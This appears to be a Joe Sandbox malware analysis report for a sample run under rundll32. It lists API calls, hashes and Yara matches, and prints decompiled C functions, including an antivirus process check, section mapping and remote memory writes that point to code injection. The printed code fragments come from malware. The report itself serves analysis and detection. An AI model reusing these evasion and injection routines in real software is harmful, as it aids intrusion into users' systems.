                                0x00000000
                                0x03437470
                                0x03437470
                                0x03437475
                                0x03437477
                                0x03437478
                                0x0343747b
                                0x00000000
                                0x0343747b
                                0x00000000
                                0x03437475
                                0x03437422
                                0x0343749c
                                0x0343749c
                                0x034374a2
                                0x034374a2
                                0x034373fe
                                0x034373b5
                                0x034373bb
                                0x034373c3
                                0x034373dc
                                0x034373de
                                0x00000000
                                0x00000000
                                0x034373c5
                                0x034373cf
                                0x034373d3
                                0x034373d9
                                0x00000000
                                0x034373d9
                                0x034373d3
                                0x034373c3
                                0x034374b5
                                0x03431cae
                                0x03431cae
                                0x03431cb5
                                0x03431cc0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431cb5

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 0343739C
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 034373AB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 034373B5
                                • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 0343742E
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 0343743F
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 03437449
                                  • Part of subcall function 03434A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 03434A9C
                                  • Part of subcall function 03434A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 03434AAC
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03434ADE
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B03
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B23
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 0ebdd744012f4374de81a1b4c80b51d4f6326d6e1bb39cacaefe7dec51413917
                                • Instruction ID: a9deba8802ecdc310d90883bba1404091d33867761c52b9fc357c191e83545ea
                                • Opcode Fuzzy Hash: 0ebdd744012f4374de81a1b4c80b51d4f6326d6e1bb39cacaefe7dec51413917
                                • Instruction Fuzzy Hash: CB41A372600304BFCB21EBA5CC44BABBFB9AF8E260F15456AE5D5EF250D770E9018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03482331 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0348235C
                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 03482369
                                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 034823F5
                                • GetModuleHandleA.KERNEL32(00000000), ref: 03482400
                                • RtlImageNtHeader.NTDLL(00000000), ref: 03482409
                                • RtlExitUserThread.NTDLL(00000000), ref: 0348241E
                                  • Part of subcall function 03480818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03482397,?), ref: 03480820
                                  • Part of subcall function 03480818: GetVersion.KERNEL32 ref: 0348082F
                                  • Part of subcall function 03480818: GetCurrentProcessId.KERNEL32 ref: 0348084B
                                  • Part of subcall function 03480818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03480868
                                  • Part of subcall function 0347C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0347C815
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                  • Part of subcall function 0348212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                  • Part of subcall function 0348212C: GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                  • Part of subcall function 0348212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                  • Part of subcall function 0348212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                  • Part of subcall function 0348212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                • String ID:
                                • API String ID: 2581485877-0
                                • Opcode ID: 5452e1e884380a1c22908d32988954df70975806e895fbcc15e6dab476305d23
                                • Instruction ID: 0e527c80bc09be0f412ef8cd008e9413537d553015bffd9283196a948cc7e13e
                                • Opcode Fuzzy Hash: 5452e1e884380a1c22908d32988954df70975806e895fbcc15e6dab476305d23
                                • Instruction Fuzzy Hash: 0C310335900218AFCB22FF74DC84AAEB7F8EB45710B25456BE516FF200D7708844CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034368BD Relevance: 7.5, APIs: 5, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034368BD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0x343a348; // 0x21ad5a8
						_t2 = _t9 + 0x343beb0; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                0x034368c8
                                0x034368cd
                                0x034368d2
                                0x034368d6
                                0x034368e0
                                0x03436911
                                0x034368e7
                                0x034368ec
                                0x03436902
                                0x03436919
                                0x03436904
                                0x0343690c
                                0x00000000
                                0x0343690c
                                0x0343691a
                                0x0343691b
                                0x00000000
                                0x0343691b
                                0x00000000
                                0x03436915
                                0x03436921
                                0x03436926

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034368CD
                                • Process32First.KERNEL32(00000000,?), ref: 034368E0
                                • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 034368FA
                                • Process32Next.KERNEL32(00000000,?), ref: 0343690C
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0343691B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3243318325-0
                                • Opcode ID: 083c52a6ad5f79dbedfa5d13507b1cc5aba2d0b612638e00b42c52aacf49bde3
                                • Instruction ID: 5343edb42bc9883cdd52801f0c6566da6d0e958cbf47f7fc0324cf46a8156553
                                • Opcode Fuzzy Hash: 083c52a6ad5f79dbedfa5d13507b1cc5aba2d0b612638e00b42c52aacf49bde3
                                • Instruction Fuzzy Hash: ECF0F6361012157AD720E6668C88EEB76ACDFCE310F010067EA55DF100EB64DA468AA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347710A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 03477167
                                  • Part of subcall function 0348BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                • memset.NTDLL ref: 0347718B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                • Instruction ID: b2246a1235e2bf204516a46e0f03216bfa4a0896ba7a039af38ac2f9674cd0fc
                                • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                • Instruction Fuzzy Hash: FF214AB6D00209AFDB10DFA9C8809EEFBF9EF48350F10452AE615F7210D730AA458BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034861AE Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(?,00000318), ref: 034861D3
                                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 034861EF
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                  • Part of subcall function 0348A806: GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                  • Part of subcall function 0348A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03486359
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                • String ID:
                                • API String ID: 3547194813-0
                                • Opcode ID: 50806affa128e56c8a4db5d22d16278ae5cb28012cc8d3ebf0d006942f11de93
                                • Instruction ID: 76f816a1752df15c79433984fe4a57b6a765a996f90cf1f759017ef03c74588e
                                • Opcode Fuzzy Hash: 50806affa128e56c8a4db5d22d16278ae5cb28012cc8d3ebf0d006942f11de93
                                • Instruction Fuzzy Hash: 9E612E71A0060AAFDB55EF95C880BEEB7B4FF08300F15456AEA04AF341D774E954DBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03480782 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 03480796
                                • GetProcAddress.KERNEL32(?), ref: 034807BE
                                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 034807DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressInformationProcProcess64QueryWow64memset
                                • String ID:
                                • API String ID: 2968673968-0
                                • Opcode ID: 65a9dd8742f57f9a8d3518bcd8ecef4dbd8b55ca5abcd23d94e32f3dc54fae95
                                • Instruction ID: ead4a981a7efe8df59460c5c6728e904465b6aea7692dc9890ab03b3470c826b
                                • Opcode Fuzzy Hash: 65a9dd8742f57f9a8d3518bcd8ecef4dbd8b55ca5abcd23d94e32f3dc54fae95
                                • Instruction Fuzzy Hash: A1117035A10219BFEB10EB95DC45F9EBBE8EB54740F04402AE904EF294D770ED09CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03487950 Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                • SetLastError.KERNEL32(00000000), ref: 0348798F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$AllocateLastMemoryStatusVirtual
                                • String ID:
                                • API String ID: 722216270-0
                                • Opcode ID: 789cba1f1b1039115cf30d3890fc963ee9d3daf638fb08c6e3ff0bc687c6f5a9
                                • Instruction ID: df6d17ed2c08ce4e59598af611a441041d967b98436290ea405d8ffdcc16e4af
                                • Opcode Fuzzy Hash: 789cba1f1b1039115cf30d3890fc963ee9d3daf638fb08c6e3ff0bc687c6f5a9
                                • Instruction Fuzzy Hash: 62F0FEB1911309FBFB05DB95D91AB9EBBBCAB54355F204049A600AA180DBB4AB04DB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485312 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0348907F,?,00000004,00000000,00000004,?), ref: 03485330
                                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0348533F
                                • SetLastError.KERNEL32(00000000,?,0348907F,?,00000004,00000000,00000004,?,?,?,?,0347C691,?,00000000,CCCCFEEB,?), ref: 03485346
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$LastMemoryStatusVirtualWrite
                                • String ID:
                                • API String ID: 1089604434-0
                                • Opcode ID: 56532238140da9782a913586658e6a9b6354743ee074c95a3bf160a8e5f0cbc5
                                • Instruction ID: fcf379404fd8926acdc2269d4715dee52718ebc81c787474ac3caf622484fd07
                                • Opcode Fuzzy Hash: 56532238140da9782a913586658e6a9b6354743ee074c95a3bf160a8e5f0cbc5
                                • Instruction Fuzzy Hash: 9FE04837100119ABCF026FE9AC04DDFBB99FB19750B004056FE01DA110C771C8219BE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343190C Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E0343190C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E03436D0A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                0x03431915
                                0x0343191c
                                0x0343191d
                                0x0343191e
                                0x0343191f
                                0x03431920
                                0x03431931
                                0x03431935
                                0x03431949
                                0x0343194c
                                0x0343194f
                                0x03431956
                                0x03431959
                                0x03431960
                                0x03431963
                                0x03431966
                                0x03431969
                                0x0343196e
                                0x034319a9
                                0x03431970
                                0x03431973
                                0x03431979
                                0x0343197e
                                0x03431982
                                0x034319a0
                                0x03431984
                                0x0343198b
                                0x03431999
                                0x03431999
                                0x03431982
                                0x034319b1

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0343459D), ref: 03431969
                                  • Part of subcall function 03436D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0343197E,00000002,00000000,?,?,00000000,?,?,0343197E,00000000), ref: 03436D37
                                • memset.NTDLL ref: 0343198B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID:
                                • API String ID: 2533685722-0
                                • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction ID: 4312233570919d60fc4521c14373c303a1d7c1907fe703a8d98e05decf33235a
                                • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                • Instruction Fuzzy Hash: 16213BB5D00209AFDB00DFA9C8809EEFBB9EF49214F10446AE516F7210D7309A098F64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034341FA Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034341FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E034361FC(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E03432AE4(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E03434822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x343a2d8, 0, _t25);
				}
				return _t22;
			}











                                0x034341fa
                                0x0343420b
                                0x0343420f
                                0x0343426a
                                0x03434211
                                0x03434218
                                0x03434220
                                0x03434223
                                0x03434228
                                0x0343422c
                                0x03434232
                                0x0343423a
                                0x0343423d
                                0x03434255
                                0x03434255
                                0x03434260
                                0x03434260
                                0x03434271

                                APIs
                                  • Part of subcall function 034361FC: lstrlen.KERNEL32(?,00000000,055E9D70,00000000,034339E8,055E9F93,69B25F44,?,?,?,?,69B25F44,00000005,0343A00C,4D283A53,?), ref: 03436203
                                  • Part of subcall function 034361FC: mbstowcs.NTDLL ref: 0343622C
                                  • Part of subcall function 034361FC: memset.NTDLL ref: 0343623E
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,055E93F4), ref: 03434232
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,055E93F4), ref: 03434260
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID:
                                • API String ID: 1500278894-0
                                • Opcode ID: 1a3fe0a137a56826d45b85a7ef0d62a6c4da6164b83460332080218df9e2fad2
                                • Instruction ID: a9c9a71eb9a2e7b89137cefa96969cefdc902e412b3cae84c1ec47e6f5b6c8d4
                                • Opcode Fuzzy Hash: 1a3fe0a137a56826d45b85a7ef0d62a6c4da6164b83460332080218df9e2fad2
                                • Instruction Fuzzy Hash: E2015E35204249BADB21AE959C44EDB7BB8FB8A750F00042AFA40AF260D6B19954D754
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348A806 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressMemory64ProcReadVirtualWow64
                                • String ID:
                                • API String ID: 752694512-0
                                • Opcode ID: f9ff5d5cd5bd7dbc5a6704ee0d56b277a39e1d5a13043fb2718859640afb4922
                                • Instruction ID: 614aed6e8e9b735a2494c99bfb1306f2ffbf4701ddd542897780773424921bd2
                                • Opcode Fuzzy Hash: f9ff5d5cd5bd7dbc5a6704ee0d56b277a39e1d5a13043fb2718859640afb4922
                                • Instruction Fuzzy Hash: A2F0F976500108BFCB12EF99DC45C9EBBF9EB98750714455BF904DB224D2719952DB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348BE80 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                • Instruction ID: 87e1a0b947aee6a6beaac2372a50fb24d6acd59acb28ebc730eaad4e854463a5
                                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                • Instruction Fuzzy Hash: 0EF012B690020CFFDB119FA5CC85CEFBBBDEF44244B00882AF652E5050D2319E189B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436D0A Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E03436D0A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                0x03436d1c
                                0x03436d22
                                0x03436d30
                                0x03436d37
                                0x03436d3c
                                0x03436d42
                                0x00000000
                                0x03436d43
                                0x00000000

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0343197E,00000002,00000000,?,?,00000000,?,?,0343197E,00000000), ref: 03436D37
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: a5b2e6334380ea6dd9c8e7dce8f082cb13222fd5b8306a28b3012dec6d92e4a5
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: 6AF012B590020DBFDB119FA5CCC5CAFBBBDEB49294B10493AF552E6090D6309E188A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034774AE Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0349A400), ref: 034774C5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID:
                                • API String ID: 1778838933-0
                                • Opcode ID: 15ceaba2af7ad5c7f740ad5f7f78291524f230d2547b300d0124367e7bd80f6f
                                • Instruction ID: 7c06fd74c591fa90385cfb5b4e48f04297390536ea2b69a3d7a99368c7ce13f8
                                • Opcode Fuzzy Hash: 15ceaba2af7ad5c7f740ad5f7f78291524f230d2547b300d0124367e7bd80f6f
                                • Instruction Fuzzy Hash: 8AF09A317000149B8720DE29D884EEBBFA9FB023907944056E900EF224D260F901CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034356C8 Relevance: 39.2, APIs: 26, Instructions: 234memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 70%
                                			E034356C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				int _t46;
				intOrPtr _t47;
				int _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t86;
				int _t89;
				intOrPtr _t90;
				int _t93;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t100;
				int _t103;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;
				long _t116;
				intOrPtr* _t117;
